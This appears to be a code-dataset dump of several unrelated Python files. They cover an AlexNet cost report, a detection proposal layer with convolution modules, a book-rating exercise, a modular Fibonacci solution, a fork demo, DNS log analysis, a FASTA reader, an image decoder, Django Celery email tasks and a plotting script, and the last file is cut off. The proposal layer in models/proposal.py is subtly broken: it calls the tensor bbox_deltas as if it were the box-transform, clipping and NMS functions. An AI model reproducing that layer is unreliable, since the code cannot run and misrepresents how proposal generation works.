bias9)\n\n return output_softmax, parameters\n\n\ndef build_cluster():\n devices = []\n device_properties = device_properties_pb2.DeviceProperties(\n type='CPU',\n frequency=2000,\n num_cores=12,\n l1_cache_size=32768,\n l2_cache_size=262144,\n l3_cache_size=30720*1024)\n for i in range(2):\n devices.append(\n device_properties_pb2.NamedDevice(\n properties=device_properties, name='/CPU:' + str(i)))\n return cluster.Cluster(devices=devices)\n\n\nif __name__ == \"__main__\":\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\n image_size = 224\n images = tf.Variable(tf.random_normal([batch_size, image_size, image_size, 3]))\n output, parameters = inference(images)\n init = tf.global_variables_initializer()\n objective = tf.nn.l2_loss(output)\n grad = tf.gradients(objective, parameters)\n train_op = tf_ops.get_collection_ref(tf_ops.GraphKeys.TRAIN_OP)\n for i in grad:\n train_op.append(i)\n mg = meta_graph.create_meta_graph_def(graph=tf_ops.get_default_graph())\n cluster = build_cluster()\n report = cost_analyzer.GenerateCostReport(mg, per_node_report=True, cluster=cluster)\n with open('alexnet_report.json', \"w\") as f:\n f.write(str(report, encoding=\"utf-8\"))\n","sub_path":"src/pyscript/alexnet_report.py","file_name":"alexnet_report.py","file_ext":"py","file_size_in_byte":6304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"89976121","text":"# This file contains experimental modules\n\nfrom models.common import *\n\nclass _ProposalLayer(nn.Module):\n \"\"\"\n Outputs object detection proposals by applying estimated bounding-box\n transformations to a set of regular boxes (called \"anchors\").\n \"\"\"\n\n def __init__(self, feat_stride, scales, ratios):\n super(_ProposalLayer, self).__init__()\n\n self._feat_stride = feat_stride\n self._anchors = torch.from_numpy(feat_stride(scales=np.array(scales),\n ratios=np.array(ratios))).float()\n self._num_anchors = self._anchors.size(0)\n\n # rois blob: holds R regions of interest, each is a 5-tuple\n # (n, x1, y1, x2, y2) specifying an image batch index n and a\n # rectangle (x1, y1, x2, y2)\n # top[0].reshape(1, 5)\n #\n # # scores blob: holds scores for R regions of interest\n # if len(top) > 1:\n # top[1].reshape(1, 1, 1, 1)\n\n def forward(self, input):\n\n # Algorithm:\n #\n # for each (H, W) location i\n # generate A anchor boxes centered on cell i\n # apply predicted bbox deltas at cell i to each of the A anchors\n # clip predicted boxes to image\n # remove predicted boxes with either height or width < threshold\n # sort all (proposal, score) pairs by score from highest to lowest\n # take top pre_nms_topN proposals before NMS\n # apply NMS with threshold 0.7 to remaining proposals\n # take after_nms_topN proposals after NMS\n # return the top proposals (-> RoIs top, scores top)\n\n # the first set of _num_anchors channels are bg probs\n # the second set are the fg probs\n scores = input[0][:, self._num_anchors:, :, :]\n bbox_deltas = input[1]\n im_info = input[2]\n cfg_key = input[3]\n\n pre_nms_topN = input[cfg_key].RPN_PRE_NMS_TOP_N\n post_nms_topN = input[cfg_key].RPN_POST_NMS_TOP_N\n nms_thresh = input[cfg_key].RPN_NMS_THRESH\n min_size = input[cfg_key].RPN_MIN_SIZE\n\n batch_size = bbox_deltas.size(0)\n\n feat_height, feat_width = scores.size(2), scores.size(3)\n shift_x = np.arange(0, feat_width) * self._feat_stride\n shift_y = np.arange(0, feat_height) * self._feat_stride\n shift_x, shift_y = np.meshgrid(shift_x, shift_y)\n shifts = torch.from_numpy(np.vstack((shift_x.ravel(), shift_y.ravel(),\n shift_x.ravel(), shift_y.ravel())).transpose())\n shifts = shifts.contiguous().type_as(scores).float()\n\n A = self._num_anchors\n K = shifts.size(0)\n\n self._anchors = self._anchors.type_as(scores)\n # anchors = self._anchors.view(1, A, 4) + shifts.view(1, K, 4).permute(1, 0, 2).contiguous()\n anchors = self._anchors.view(1, A, 4) + shifts.view(K, 1, 4)\n anchors = anchors.view(1, K * A, 4).expand(batch_size, K * A, 4)\n\n # Transpose and reshape predicted bbox transformations to get them\n # into the same order as the anchors:\n\n bbox_deltas = bbox_deltas.permute(0, 2, 3, 1).contiguous()\n bbox_deltas = bbox_deltas.view(batch_size, -1, 4)\n\n # Same story for the scores:\n scores = scores.permute(0, 2, 3, 1).contiguous()\n scores = scores.view(batch_size, -1)\n\n # Convert anchors into proposals via bbox transformations\n proposals = bbox_deltas(anchors, bbox_deltas, batch_size)\n\n # 2. clip predicted boxes to image\n proposals = bbox_deltas(proposals, im_info, batch_size)\n # proposals = clip_boxes_batch(proposals, im_info, batch_size)\n\n # assign the score to 0 if it's non keep.\n # keep = self._filter_boxes(proposals, min_size * im_info[:, 2])\n\n # trim keep index to make it euqal over batch\n # keep_idx = torch.cat(tuple(keep_idx), 0)\n\n # scores_keep = scores.view(-1)[keep_idx].view(batch_size, trim_size)\n # proposals_keep = proposals.view(-1, 4)[keep_idx, :].contiguous().view(batch_size, trim_size, 4)\n\n # _, order = torch.sort(scores_keep, 1, True)\n\n scores_keep = scores\n proposals_keep = proposals\n _, order = torch.sort(scores_keep, 1, True)\n\n output = scores.new(batch_size, post_nms_topN, 5).zero_()\n for i in range(batch_size):\n # # 3. remove predicted boxes with either height or width < threshold\n # # (NOTE: convert min_size to input image scale stored in im_info[2])\n proposals_single = proposals_keep[i]\n scores_single = scores_keep[i]\n\n # # 4. sort all (proposal, score) pairs by score from highest to lowest\n # # 5. take top pre_nms_topN (e.g. 6000)\n order_single = order[i]\n\n if pre_nms_topN > 0 and pre_nms_topN < scores_keep.numel():\n order_single = order_single[:pre_nms_topN]\n\n proposals_single = proposals_single[order_single, :]\n scores_single = scores_single[order_single].view(-1, 1)\n\n # 6. apply nms (e.g. threshold = 0.7)\n # 7. take after_nms_topN (e.g. 300)\n # 8. return the top proposals (-> RoIs top)\n\n keep_idx_i = bbox_deltas(torch.cat((proposals_single, scores_single), 1), nms_thresh)\n keep_idx_i = keep_idx_i.long().view(-1)\n\n if post_nms_topN > 0:\n keep_idx_i = keep_idx_i[:post_nms_topN]\n proposals_single = proposals_single[keep_idx_i, :]\n scores_single = scores_single[keep_idx_i, :]\n\n # padding 0 at the end.\n num_proposal = proposals_single.size(0)\n output[i, :, 0] = i\n output[i, :num_proposal, 1:] = proposals_single\n\n return output\n\n def backward(self, top, propagate_down, bottom):\n \"\"\"This layer does not propagate gradients.\"\"\"\n pass\n\n def reshape(self, bottom, top):\n \"\"\"Reshaping happens during the call to forward.\"\"\"\n pass\n\n def _filter_boxes(self, boxes, min_size):\n \"\"\"Remove all boxes with any side smaller than min_size.\"\"\"\n ws = boxes[:, :, 2] - boxes[:, :, 0] + 1\n hs = boxes[:, :, 3] - boxes[:, :, 1] + 1\n keep = ((ws >= min_size.view(-1, 1).expand_as(ws)) & (hs >= min_size.view(-1, 1).expand_as(hs)))\n return keep\n\nclass CrossConv(nn.Module):\n # Cross Convolution Downsample\n def __init__(self, c1, c2, k=3, s=1, g=1, e=1.0, shortcut=False):\n # ch_in, ch_out, kernel, stride, groups, expansion, shortcut\n super(CrossConv, self).__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, (1, k), (1, s))\n self.cv2 = Conv(c_, c2, (k, 1), (s, 1), g=g)\n self.add = shortcut and c1 == c2\n\n def forward(self, x):\n return x + self.cv2(self.cv1(x)) if self.add else self.cv2(self.cv1(x))\n\nclass ConvPlus(nn.Module):\n # Plus-shaped convolution\n def __init__(self, c1, c2, k=3, s=1, g=1, bias=True): # ch_in, ch_out, kernel, stride, groups\n super(ConvPlus, self).__init__()\n self.cv1 = nn.Conv2d(c1, c2, (k, 1), s, (k // 2, 0), groups=g, bias=bias)\n self.cv2 = nn.Conv2d(c1, c2, (1, k), s, (0, k // 2), groups=g, bias=bias)\n\n def forward(self, x):\n return self.cv1(x) + self.cv2(x)\n\n\nclass C3(nn.Module):\n # Cross Convolution CSP\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\n super(C3, self).__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = nn.Conv2d(c1, c_, 1, 1, bias=False)\n self.cv3 = nn.Conv2d(c_, c_, 1, 1, bias=False)\n self.cv4 = Conv(2 * c_, c2, 1, 1)\n self.bn = nn.BatchNorm2d(2 * c_) # applied to cat(cv2, cv3)\n self.act = nn.LeakyReLU(0.1, inplace=True)\n self.m = nn.Sequential(*[CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n)])\n\n def forward(self, x):\n y1 = self.cv3(self.m(self.cv1(x)))\n y2 = self.cv2(x)\n return self.cv4(self.act(self.bn(torch.cat((y1, y2), dim=1))))\n\n\nclass Sum(nn.Module):\n # Weighted sum of 2 or more layers https://arxiv.org/abs/1911.09070\n def __init__(self, n, weight=False): # n: number of inputs\n super(Sum, self).__init__()\n self.weight = weight # apply weights boolean\n self.iter = range(n - 1) # iter object\n if weight:\n self.w = nn.Parameter(-torch.arange(1., n) / 2, requires_grad=True) # layer weights\n\n def forward(self, x):\n y = x[0] # no weight\n if self.weight:\n w = torch.sigmoid(self.w) * 2\n for i in self.iter:\n y = y + x[i + 1] * w[i]\n else:\n for i in self.iter:\n y = y + x[i + 1]\n return y\n\n\nclass GhostConv(nn.Module):\n # Ghost Convolution https://github.com/huawei-noah/ghostnet\n def __init__(self, c1, c2, k=1, s=1, g=1, act=True): # ch_in, ch_out, kernel, stride, groups\n super(GhostConv, self).__init__()\n c_ = c2 // 2 # hidden channels\n self.cv1 = Conv(c1, c_, k, s, g, act)\n self.cv2 = Conv(c_, c_, 5, 1, c_, act)\n\n def forward(self, x):\n y = self.cv1(x)\n return torch.cat([y, self.cv2(y)], 1)\n\n\nclass GhostBottleneck(nn.Module):\n # Ghost Bottleneck https://github.com/huawei-noah/ghostnet\n def __init__(self, c1, c2, k, s):\n super(GhostBottleneck, self).__init__()\n c_ = c2 // 2\n self.conv = nn.Sequential(GhostConv(c1, c_, 1, 1), # pw\n DWConv(c_, c_, k, s, act=False) if s == 2 else nn.Identity(), # dw\n GhostConv(c_, c2, 1, 1, act=False)) # pw-linear\n self.shortcut = nn.Sequential(DWConv(c1, c1, k, s, act=False),\n Conv(c1, c2, 1, 1, act=False)) if s == 2 else nn.Identity()\n\n def forward(self, x):\n return self.conv(x) + self.shortcut(x)\n\n\nclass MixConv2d(nn.Module):\n # Mixed Depthwise Conv https://arxiv.org/abs/1907.09595\n def __init__(self, c1, c2, k=(1, 3), s=1, equal_ch=True):\n super(MixConv2d, self).__init__()\n groups = len(k)\n if equal_ch: # equal c_ per group\n i = torch.linspace(0, groups - 1E-6, c2).floor() # c2 indices\n c_ = [(i == g).sum() for g in range(groups)] # intermediate channels\n else: # equal weight.numel() per group\n b = [c2] + [0] * groups\n a = np.eye(groups + 1, groups, k=-1)\n a -= np.roll(a, 1, axis=1)\n a *= np.array(k) ** 2\n a[0] = 1\n c_ = np.linalg.lstsq(a, b, rcond=None)[0].round() # solve for equal weight indices, ax = b\n\n self.m = nn.ModuleList([nn.Conv2d(c1, int(c_[g]), k[g], s, k[g] // 2, bias=False) for g in range(groups)])\n self.bn = nn.BatchNorm2d(c2)\n self.act = nn.LeakyReLU(0.1, inplace=True)\n\n def forward(self, x):\n return x + self.act(self.bn(torch.cat([m(x) for m in self.m], 1)))\n\n\nclass Ensemble(nn.ModuleList):\n # Ensemble of models\n def __init__(self):\n super(Ensemble, self).__init__()\n\n def forward(self, x, augment=False):\n y = []\n for module in self:\n y.append(module(x, augment)[0])\n return torch.cat(y, 1), None # ensembled inference output, train output\n","sub_path":"models/proposal.py","file_name":"proposal.py","file_ext":"py","file_size_in_byte":11376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"89354332","text":"class User(object):\n def __init__(self, name, email):\n self.name = name\n self.email = email\n self.books = {}\n\n def get_email(self):\n return self.email\n\n def change_email(self, address):\n self.email = address\n print(\"New email: {email}\".format(email=address))\n\n def read_book(self, book, rating=None):\n self.books[book] = rating\n\n def get_average_rating(self):\n rate = 0\n for ra in self.books.values():\n # print(ra)\n if type(ra) == int:\n rate += ra\n return rate/len(self.books.values())\n\n def __repr__(self):\n return \"User: {user}, email: {email}\".format(user=self.name, email=self.email)\n\n def __eq__(self, other_user):\n if isinstance(other_user, self.__class__):\n return self.name == other_user.name and self.email == other_user.email\n return False\n\n\nclass Book:\n\n def __init__(self, title, isbn):\n self.title = title\n self.isbn = isbn\n self.ratings = []\n\n def get_title(self):\n return self.title\n\n def get_isbn(self):\n return self.isbn\n\n def set_isbn(self, newIsbn):\n self.isbn = newIsbn\n print(\"{book} ISBN has been updated to {isbn}\".format(book=self.title, isbn=self.isbn))\n\n def add_rating(self, rating):\n if rating is not None:\n if rating >= 0 and rating <= 4:\n return self.ratings.append(rating)\n else:\n print(\"\\n Invalid Rating \\n\")\n\n def get_average_rating(self):\n if len(self.ratings) != 0:\n self.aver = sum(self.ratings)/len(self.ratings)\n return int(self.aver)\n else:\n return \"No ratings\"\n\n def __eq__(self, another_book):\n if isinstance(another_book, self.__class__):\n return self.title == another_book.title and self.isbn == another_book.isbn\n return False\n\n def __hash__(self):\n return hash((self.title, self.isbn))\n\n\nclass Fiction(Book):\n def __init__(self, title, author, isbn):\n super().__init__(title, isbn)\n self.author = author\n\n def get_author(self):\n return self.author\n\n def __repr__(self):\n return \"\\\"{title}\\\" by {author}\".format(title=self.title, author=self.author)\n\n\nclass Non_Fiction(Book):\n def __init__(self, title, subject, level, isbn):\n super().__init__(title, isbn)\n self.subject = subject\n self.level = level\n\n def get_subject(self):\n return self.subject\n\n def get_level(self):\n return self.level\n\n def __repr__(self):\n return \"\\\"{title},\\\" a {level} manual on {subject}\".format(title=self.title, level=self.level, subject=self.subject)\n\n\nclass TomeRater:\n def __init__(self):\n self.users = {}\n self.books = {}\n self.isbnDic = {}\n\n def create_book(self, title, isbn):\n self.isbnDic[title] = isbn\n return Book(title, isbn)\n\n def create_novel(self, title, author, isbn):\n self.isbnDic[title] = isbn\n return Fiction(title, author, isbn)\n\n def create_non_fiction(self, title, subject, level, isbn):\n self.isbnDic[title] = isbn\n return Non_Fiction(title, subject, level, isbn)\n\n def add_book_to_user(self, book, email, rating=None):\n if email not in self.users.keys():\n return \"No user with email {}\".format(email)\n else:\n self.users[email].read_book(book, rating)\n book.add_rating(rating)\n if book not in self.books.keys():\n self.books[book] = 1\n else:\n self.books[book] += 1\n\n def add_user(self, name, email, user_books=None):\n validEmail = [\".com\", \".edu\", \".org\"]\n if email not in self.users.keys():\n if email[-4:] in validEmail and \"@\" in email:\n self.users[email] = User(name, email)\n if user_books is not None:\n for boo in user_books:\n self.add_book_to_user(boo, email)\n else:\n print(\"Invalid email for {user} {email}\".format(user=name, email=email))\n else:\n print(\"{} user already exists.\".format(self.users[email]))\n\n def print_catalog(self):\n for boo in self.books.keys():\n print(boo)\n\n def print_users(self):\n for us in self.users.values():\n print(us)\n\n def print_isbnDic(self):\n for key, val in self.isbnDic.items():\n print(key, val)\n\n def get_most_read_book(self):\n newKey = \"\"\n newVal = 0\n for key, val in self.books.items():\n if val > newVal:\n newVal = val\n newKey = key.title\n return newKey, newVal\n\n def highest_rated_book(self):\n newKey = \"\"\n newVal = 0\n for key in self.books.keys():\n if key.get_average_rating() == \"No ratings\":\n continue\n elif key.get_average_rating() > newVal:\n newVal = key.get_average_rating()\n newKey = key.title\n return newKey, newVal\n\n def most_positive_user(self):\n posUser = \"\"\n newVal = 0\n for use in self.users.values():\n if use.get_average_rating() > newVal:\n posUser = use\n newVal = use.get_average_rating()\n return posUser, newVal\n\n def __repr__(self):\n numUsers = len(self.users.values())\n numBooks = len(self.books.keys())\n return \"There are {numUsers} users and {numBooks} books in TomeRater!\".format(numUsers=numUsers, numBooks=numBooks)\n\n\nTome_Rater = TomeRater()\n\n# Create some books:\nbook1 = Tome_Rater.create_book(\"Society of Mind\", 12345678)\nnovel1 = Tome_Rater.create_novel(\"Alice In Wonderland\", \"Lewis Carroll\", 12345)\nnovel1.set_isbn(9781536831139)\nnonfiction1 = Tome_Rater.create_non_fiction(\n \"Automate the Boring Stuff\", \"Python\", \"beginner\", 1929452)\nnonfiction2 = Tome_Rater.create_non_fiction(\n \"Computing Machinery and Intelligence\", \"AI\", \"advanced\", 11111938)\nnovel2 = Tome_Rater.create_novel(\"The Diamond Age\", \"Neal Stephenson\", 10101010)\nnovel3 = Tome_Rater.create_novel(\"There Will Come Soft Rains\", \"Ray Bradbury\", 10001000)\n\n# Create users:\nTome_Rater.add_user(\"Alan Turing\", \"alan@turing.com\")\nTome_Rater.add_user(\"David Marr\", \"david@computation.org\")\n\n# Add a user with three books already read:\nTome_Rater.add_user(\"Marvin Minsky\", \"marvin@mit.edu\", user_books=[book1, novel1, nonfiction1])\n\n# Add books to a user one by one, with ratings:\nTome_Rater.add_book_to_user(book1, \"alan@turing.com\", 1)\nTome_Rater.add_book_to_user(novel1, \"alan@turing.com\", 3)\nTome_Rater.add_book_to_user(nonfiction1, \"alan@turing.com\", 3)\nTome_Rater.add_book_to_user(nonfiction2, \"alan@turing.com\", 4)\nTome_Rater.add_book_to_user(novel3, \"alan@turing.com\", 1)\n\nTome_Rater.add_book_to_user(novel2, \"marvin@mit.edu\", 2)\nTome_Rater.add_book_to_user(novel3, \"marvin@mit.edu\", 2)\nTome_Rater.add_book_to_user(novel3, \"david@computation.org\", 4)\nTome_Rater.add_book_to_user(novel3, \"bin@computation.org\", 20)\n\n\n# Uncomment these to test your functions:\nprint(\"\\nCatalog: \\n\")\nTome_Rater.print_catalog()\nprint(\"\\nUsers: \\n\")\nTome_Rater.print_users()\nprint(\"\\nISBN: \\n\")\nTome_Rater.print_isbnDic()\nprint(\"\\n \\n\")\n","sub_path":"TomeRater_Agostino_062518/TomeRater.py","file_name":"TomeRater.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"79794013","text":"\"\"\"\r\nIn these days of Lockdown, Motu's Father bussiness is in Loss. On Zeroth day of Lockdown the loss was Rs P, then Rs Q on the First day. Motu observed loss as a function and wanted to calculate the loss on Nth day of the Lockdown. He observed that the loss is dependent on the previous days, i.e. F(n)=F(n−1)+F(n−2)+F(n−1)∗F(n−2)\r\nYou are given the loss on Zeroth day and the First day of Lockdown. You have to find the loss on Nth day.\r\n\"\"\"\r\n\r\nmod = 10**9 + 7\r\n\r\ndef fib(n): \r\n F = [[1, 1], \r\n [1, 0]] \r\n if (n == 0): \r\n return 0\r\n power(F, n - 1) \r\n \r\n return F[0][0] \r\n \r\ndef multiply(F, M): \r\n \r\n x = (F[0][0] * M[0][0] + F[0][1] * M[1][0])%(mod-1)\r\n y = (F[0][0] * M[0][1] + F[0][1] * M[1][1])%(mod-1)\r\n z = (F[1][0] * M[0][0] + F[1][1] * M[1][0])%(mod-1)\r\n w = (F[1][0] * M[0][1] + F[1][1] * M[1][1])%(mod-1)\r\n \r\n F[0][0] = x \r\n F[0][1] = y \r\n F[1][0] = z \r\n F[1][1] = w \r\n \r\n# Optimized version of \r\n# power() in method 4 \r\ndef power(F, n): \r\n \r\n if( n == 0 or n == 1): \r\n return; \r\n M = [[1, 1], \r\n [1, 0]]; \r\n \r\n power(F, n // 2) \r\n multiply(F, F) \r\n \r\n if (n % 2 != 0): \r\n multiply(F, M) \r\n\r\nt = int(input())\r\nfor _ in range(t):\r\n p, q, n = map(int, input().split())\r\n if n == 0:\r\n print(p)\r\n continue\r\n \r\n f1 = fib(n)\r\n f2 = fib(n-1)\r\n ans = pow(p+1, f2, mod)*pow(q+1, f1, mod)\r\n ans -= 1\r\n ans %= mod\r\n\r\n print(ans)\r\n","sub_path":"8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"520054958","text":"#! /usr/bin/env python3 \n\nimport os \nfrom time import sleep \n\na=1\n\npid=os.fork()\n\nif pid < 0:\n print('创建失败')\n\nelif pid == 0:\n b=1\n s=0\n while b < 10:\n s += a\n b += 1\n\n print('s=',s)\n\nelse:\n sleep(1)\n print('父进程结束')\n\n","sub_path":"网络/pythonNet/day4/forklianxi.py","file_name":"forklianxi.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"57745925","text":"import tools\nimport positions\n\ndef runit(display=True):\n l=tools.Layout(100,50,50.,0.1)\n l.ball.x=30\n l.ball.y=25\n # layout,x,y,jersey,team\n home_runner1=positions.Runner(l,5,20,1,1)\n home_runner2=positions.Runner(l,15,25,2,1)\n home_runner3=positions.Runner(l,5,30,3,1)\n home_runner4=positions.Runner(l,5,35,4,1)\n home_bruiser1=positions.Bruiser(l,40,30,5,1)\n home_bruiser2=positions.Bruiser(l,40,25,6,1)\n home_bruiser3=positions.Bruiser(l,40,20,7,1)\n home_catcher1=positions.Catcher(l,95,45,8,1)\n home_thrower1=positions.Thrower(l,40,10,9,1)\n home_thrower2=positions.Thrower(l,40,20,9,1)\n home_thrower3=positions.Thrower(l,40,30,9,1)\n home_thrower4=positions.Thrower(l,40,40,9,1)\n #\n away_runner1=positions.Runner(l,95,20,1,-1)\n away_runner2=positions.Runner(l,95,26,2,-1)\n away_runner3=positions.Runner(l,95,31,3,-1)\n away_runner4=positions.Runner(l,95,20,4,-1)\n away_thrower1=positions.Thrower(l,90,10,9,-1)\n away_thrower2=positions.Thrower(l,90,20,9,-1)\n away_thrower3=positions.Thrower(l,90,30,9,-1)\n away_thrower4=positions.Thrower(l,90,40,9,-1)\n #\n l.add_player(home_thrower1)\n l.add_player(home_thrower2)\n l.add_player(home_thrower3)\n l.add_player(home_thrower4)\n l.add_player(away_thrower1)\n l.add_player(away_thrower2)\n l.add_player(away_thrower3)\n l.add_player(away_thrower4)\n #l.add_player(home_runner1)\n #l.add_player(home_runner2)\n #l.add_player(home_catcher1)\n #l.add_player(home_thrower)\n #l.add_player(home_runner3)\n #l.add_player(home_runner4)\n #l.add_player(home_bruiser1)\n #l.add_player(home_bruiser2)\n #l.add_player(home_bruiser3)\n #l.add_player(away_runner1)\n #l.add_player(away_runner2)\n #l.add_player(away_runner3)\n #l.add_player(away_runner4)\n\n l.run_game(display)\n\n#runit()\n","sub_path":"sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"232307757","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport argparse\nimport traceback\nfrom decimal import Decimal\nfrom collections import deque,defaultdict\nfrom log import ExtendEntry\nsys.path.append('python-tools')\nfrom group import UnsortedInputGrouper,Group\n\nclass Data(object):\n def __init__(self):\n self.repeats = 0\n self.total = 0\n\nclass IntervalGroup(Group):\n def __init__(self, tup):\n super(IntervalGroup, self).__init__(tup)\n self.queries = deque()\n self.counts = defaultdict(Data)\n\n def add(self, chunks):\n e = ExtendEntry.parseChunks(chunks)\n name = e.query.question\n time = e.time\n\n while len(self.queries) > 0 and abs(time - self.queries[-1][1]) > args.limit:\n self.queries.pop()\n\n queried = set([name])\n for nn,tt in self.queries:\n known = len(queried)\n self.counts[known].total += 1\n if nn not in queried:\n queried.add(nn)\n else:\n self.counts[known].repeats += 1\n\n self.queries.appendleft( (name,time) )\n\n def done(self):\n for d in sorted(self.counts):\n args.outfile.write(' '.join(self.tup + map(str, [d, self.counts[d].repeats, self.counts[d].total])) + '\\n')\n\nif __name__ == \"__main__\":\n # set up command line args\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\\\n description='Probability of a new name versus number of queries')\n parser.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin)\n parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'), default=sys.stdout)\n parser.add_argument('-l', '--limit', type=Decimal, default=Decimal('86400'))\n args = parser.parse_args()\n\n grouper = UnsortedInputGrouper(args.infile, IntervalGroup, [9], None)\n grouper.group()\n\n","sub_path":"scripts/prob_new_domain.py","file_name":"prob_new_domain.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"81185699","text":"import re\n\ndef read_fasta(f):\n seqs = {}\n seqid = None\n seq = None\n for l in f:\n l = l.rstrip('\\r\\n')\n if l.startswith('>'):\n if seqid:\n seqs[seqid] = seq\n seqid = l\n seq = ''\n else:\n seq += l\n seqs[seqid] = seq\n return seqs\n\ndef chunks(s, n):\n for i in range(0, len(s), n):\n yield s[i:i+n]\n\ndef fasta_entry(sid, seq):\n s = ''\n if not sid.startswith('>'):\n sid = '>'+sid\n s += sid+'\\n'\n s += '\\n'.join(chunks(seq, 60))+'\\n'\n return s\n\nsid_splitter = re.compile(r'>(.*) \\|(.*) \\[(.*)\\]')","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"304413530","text":"import StringIO\nimport struct\nfrom bitstring import BitArray\nfrom imageformat import ImageFormat\n\nclass RGB5A3(ImageFormat):\n def __init__(self, data, width, height):\n self.blockWidth = 4\n self.blockHeight = 4\n self.blockSize = 32\n ImageFormat.__init__(self, data, width, height)\n \n def decodeBlock(self, block):\n bl = []\n s = StringIO.StringIO(block)\n \n for j in range(0, 4):\n bl.append([])\n for i in range(0, 4):\n pix = BitArray(uint=struct.unpack('>H', s.read(2))[0], length=16)\n alphaFlag = pix[:1].uint\n\n if alphaFlag == 1:\n a = 255\n r = self.colourScale(pix[1:6].uint, 32)\n g = self.colourScale(pix[6:11].uint, 32)\n b = self.colourScale(pix[11:16].uint, 32)\n else:\n a = self.colourScale(pix[1:4].uint, 8)\n r = pix[4:8].uint * 17\n g = pix[8:12].uint * 17\n b = pix[12:16].uint * 17\n\n bl[j].append((r, g, b, a))\n \n return bl","sub_path":"modules/image_formats/rgb5a3.py","file_name":"rgb5a3.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"81214064","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom celery import Celery\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.template import loader\nimport os\nimport django\n\n\n# 在任务处理这一段加此代码\n# django环境初始化\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'dailyfresh.settings')\ndjango.setup()\n\nfrom goods.models import GoodsType, IndexGoodsBanner, IndexPromotionBanner, IndexTypeGoodsBanner\n\napp = Celery('celery_tasks.tasks', broker='')\n\n# 定义任务函数\n@app.task\ndef send_register_active_email(to_email, username, token):\n \"\"\"发送激活邮件\"\"\"\n subject = '天天生鲜欢迎信息'\n message = ''\n sender = settings.EMAIL_FROM\n receiver = [to_email]\n html_message = f'

{username}, 欢迎您成为天天生鲜注册会员

请点击下面链接激活您的账户
' \\\n f'http://127.0.0.1:8000/user/active/{token}'\n send_mail(subject, message, sender, receiver, html_message=html_message)\n\n@app.task\ndef generate_static_index_html():\n \"\"\"产生首页静态页面\"\"\"\n # 获取商品种类信息\n types = GoodsType.objects.all()\n\n # 获取首页轮播商品信息\n goods_banners = IndexGoodsBanner.objects.all().order_by('index')\n\n # 获取首页促销活动信息\n promotion_banners = IndexPromotionBanner.objects.all().order_by('index')\n\n # 获取首页分类商品展示信息\n for type in types: # GoodsType\n # 获取type种类首页分类商品的图片展示信息\n image_banners = IndexTypeGoodsBanner.objects.filter(type=type, display_type=1).order_by('index')\n # 获取type种类首页分类商品的文字展示信息\n title_banners = IndexTypeGoodsBanner.objects.filter(type=type, display_type=0).order_by('index')\n\n # 动态给type增加属性,分别保存首页分类商品的图片展示信息和文字展示信息\n type.image_banners = image_banners\n type.title_banners = title_banners\n\n # 组织模板上下文\n context = {\n 'types': types,\n 'goods_banners': goods_banners,\n 'promotion_banners': promotion_banners\n }\n\n temp = loader.get_template('static_index.html')\n static_index_html = temp.render(context)\n save_path = os.path.join(settings.BASE_DIR, 'static/index.html')\n with open(save_path, 'w') as f:\n f.write(static_index_html)","sub_path":"dailyfresh/celery_tasks/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"207012919","text":"import json\n\n\nfilename = \"inventory.json\"\ndoplot = True\n\n# parse the json file\nwith open(filename) as f:\n data = json.load(f)\n\ntimestep = 0\nnuclides = data['inventory_data'][timestep]['nuclides']\n\nelements = {}\nk = 'element'\nv = 'grams'\nfor n in nuclides:\n if n[k] in elements:\n elements[n[k]] += n[v]\n else:\n elements[n[k]] = n[v]\n\ntotal_grams = sum([g for e, g in elements.items()])\nfor e, g in elements.items():\n print(\"{} {:.2f}%\".format(e, g*100.0/total_grams))\n\nlabels, values = list(zip(*(list(elements.items()))))\n\nif doplot:\n import matplotlib.pyplot as plt\n plt.pie(list(values), labels=list(labels), autopct='%2.2f%%', shadow=False)\n plt.savefig('pie.pdf')\n","sub_path":"2018/exercises/4/inventory1.py","file_name":"inventory1.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"493325212","text":"import argparse\nimport os\nimport sys\n\ntry:\n sys.path.index(os.getcwd()) \nexcept ValueError:\n sys.path.append(os.getcwd()) \n\nfrom make_dependency import get_dependencies\n\n#path_to_files = ['control/code/wears_jacket.py', 'control/code/wears_jacket_with_if.py', 'control/code/is_prime.py', ]\nprefix = '../../topics'\nworksheet_source = 'src/fa20'\n\ndef 